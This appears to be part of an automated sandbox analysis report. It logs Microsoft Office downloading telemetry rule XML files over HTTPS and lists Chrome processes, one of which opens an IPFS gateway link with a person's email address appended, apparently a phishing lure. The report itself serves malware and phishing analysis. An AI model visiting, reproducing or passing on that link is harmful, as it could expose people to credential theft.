                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:58 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:58 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1360
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:07 GMT
                                                  ETag: "0x8DC582BEDC8193E"
                                                  x-ms-request-id: 91059a31-001e-002b-0a0c-2b99f2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195058Z-17c5cb586f6zcqf8r7the4ske000000002dg000000001gdm
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:58 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  143192.168.2.45245613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:58 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:58 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:58 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1406
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                  ETag: "0x8DC582BEB16F27E"
                                                  x-ms-request-id: 6a8dfae7-001e-000b-0c81-2915a7000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195058Z-17c5cb586f67hfgj2durhqcxk8000000090g000000005bbz
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:58 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  144192.168.2.45245713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:59 UTC192OUTGET /rules/rule703000v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:59 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:59 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1369
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                  ETag: "0x8DC582BE32FE1A2"
                                                  x-ms-request-id: e4f189f6-d01e-005a-18af-2a7fd9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195059Z-159b85dff8fc5h75hC1DFWntr800000001m00000000031gd
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:59 UTC1369INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 4d 61 63 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" /> <F T


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  145192.168.2.45245813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:59 UTC192OUTGET /rules/rule700751v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:59 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:59 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1414
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BE03B051D"
                                                  x-ms-request-id: 897ec3ad-201e-005d-0167-27afb3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195059Z-16849878b78xblwksrnkakc08w000000094000000000zxtc
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:59 UTC1414INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  146192.168.2.45245913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:59 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:59 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:59 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1377
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                  ETag: "0x8DC582BEAFF0125"
                                                  x-ms-request-id: d6a1c2a7-101e-0079-31ea-2a5913000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195059Z-16849878b78qf2gleqhwczd21s0000000a6000000000ecax
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:59 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  147192.168.2.45246013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:59 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:59 UTC517INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:59 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1399
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                  ETag: "0x8DC582BE0A2434F"
                                                  x-ms-request-id: 23d501f6-c01e-0079-39b4-2ae51a000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195059Z-159b85dff8fprglthC1DFW8zcg00000001vg00000000cwb5
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:59 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  148192.168.2.45246113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:59 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:59 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:59 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1362
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                  ETag: "0x8DC582BE54CA33F"
                                                  x-ms-request-id: f416a087-401e-0035-39d7-2682d8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195059Z-17c5cb586f67hfgj2durhqcxk800000008x000000000fnkb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:59 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  149192.168.2.45246213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:59 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:51:00 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:59 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 1409
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                  ETag: "0x8DC582BDFC438CF"
                                                  x-ms-request-id: 623250e5-d01e-00ad-1e9c-27e942000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195059Z-16849878b78sx229w7g7at4nkg000000086g00000000k6p7
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:51:00 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:15:49:32
                                                  Start date:31/10/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                  Imagebase:0x7ff76e190000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:15:49:36
                                                  Start date:31/10/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=2076,i,5621221756577242458,7014284374741819107,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                  Imagebase:0x7ff76e190000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:3
                                                  Start time:15:49:38
                                                  Start date:31/10/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.com"
                                                  Imagebase:0x7ff76e190000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  No disassembly